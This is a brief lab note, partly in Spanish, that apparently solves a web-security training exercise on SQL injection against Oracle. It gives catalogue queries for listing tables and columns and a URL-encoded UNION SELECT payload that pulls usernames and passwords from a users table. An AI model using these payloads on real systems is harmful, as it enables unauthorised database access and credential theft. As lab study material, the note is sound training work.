06 - SQL injection attack, listing the database contents on Oracle

Oracle detected

Extraemos nombres de las tablas (en oracle solo hay una base de datos)

SELECT owner, table_name FROM all_tables;

SELECT column_name,column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'

Dumpeamos los datos con concatenaciones :

'+UNION+SELECT+USERNAME_UKFAPP||':'||PASSWORD_LHYWXK,''+FROM+USERS_HSTQSG+--+-